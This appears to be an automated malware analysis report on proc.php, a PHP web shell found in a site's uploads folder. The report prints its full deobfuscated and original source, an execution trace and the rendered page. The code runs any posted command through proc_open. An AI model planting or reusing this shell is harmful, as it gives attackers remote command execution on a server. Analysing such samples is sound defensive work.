PHP Malware Analysis
proc.php
md5: 52cccae2053e0b2587a909714050a3e3
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- proc_open (Deobfuscated, Original)
Input
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
print "\n";
$disable_functions = @ini_get("disable_functions");
echo "<font face=courier size=2>disable func : <i><font color=red size=2> " . $disable_functions;
print "\n";
?><br></font>
<form method="post">
<font face=courier new size=2>Command :</font> <input type="text" class="area" name="cmd" size="30" height="20" value="ls -la" style="margin: 5px auto; padding-left: 5px;" required><br>
<button type="submit">Execute</button>
</form><hr>
<?php
$descriptorspec = array(
0 => array("pipe", "r"),
// stdin is a pipe that the child will read from
1 => array("pipe", "w"),
// stdout is a pipe that the child will write to
2 => array("pipe", "r"),
);
$env = array('some_option' => 'aeiou');
$meki = "";
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
echo "<table width=100%><td><textarea cols=90 rows=25>";
$process = proc_open($cmd, $descriptorspec, $pipes, $meki, $env);
echo stream_get_contents($pipes[1]);
die;
}
?>
Execution traces
data/traces/52cccae2053e0b2587a909714050a3e3_trace-1676246787.9622.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:06:53.860028]
1 0 1 0.000200 393512
1 3 0 0.000274 399184 {main} 1 /var/www/html/uploads/proc.php 0 0
2 4 0 0.000292 399184 ini_get 0 /var/www/html/uploads/proc.php 1 1 'disable_functions'
2 4 1 0.000309 399664
2 4 R 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1 A /var/www/html/uploads/proc.php 1 $disable_functions = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1 A /var/www/html/uploads/proc.php 8 $descriptorspec = [0 => [0 => 'pipe', 1 => 'r'], 1 => [0 => 'pipe', 1 => 'w'], 2 => [0 => 'pipe', 1 => 'r']]
1 A /var/www/html/uploads/proc.php 12 $env = ['some_option' => 'aeiou']
1 A /var/www/html/uploads/proc.php 13 $meki = ''
1 3 1 0.000400 399632
0.000425 317000
TRACE END [2023-02-12 22:06:53.860282]
Generated HTML code
<html><head></head><body><font face="courier" size="2">disable func : <i><font color="red" size="2"> pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
<br></font>
<form method="post">
<font face="courier" new="" size="2">Command :</font> <input type="text" class="area" name="cmd" size="30" height="20" value="ls -la" style="margin: 5px auto; padding-left: 5px;" required=""><br>
<button type="submit">Execute</button>
</form><hr>
</i></font></body></html>Original PHP code
<?php print "\n";$disable_functions = @ini_get("disable_functions"); echo "<font face=courier size=2>disable func : <i><font color=red size=2> ".$disable_functions; print "\n"; ?><br></font>
<form method="post">
<font face=courier new size=2>Command :</font> <input type="text" class="area" name="cmd" size="30" height="20" value="ls -la" style="margin: 5px auto; padding-left: 5px;" required><br>
<button type="submit">Execute</button>
</form><hr>
<?php
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "r") // stderr is a file to write to
);
$env = array('some_option' => 'aeiou');
$meki = "";
if(isset($_POST['cmd'])){
$cmd = ($_POST['cmd']);
echo "<table width=100%><td><textarea cols=90 rows=25>";
$process = proc_open($cmd, $descriptorspec, $pipes, $meki, $env);
echo stream_get_contents($pipes[1]); die; }
?>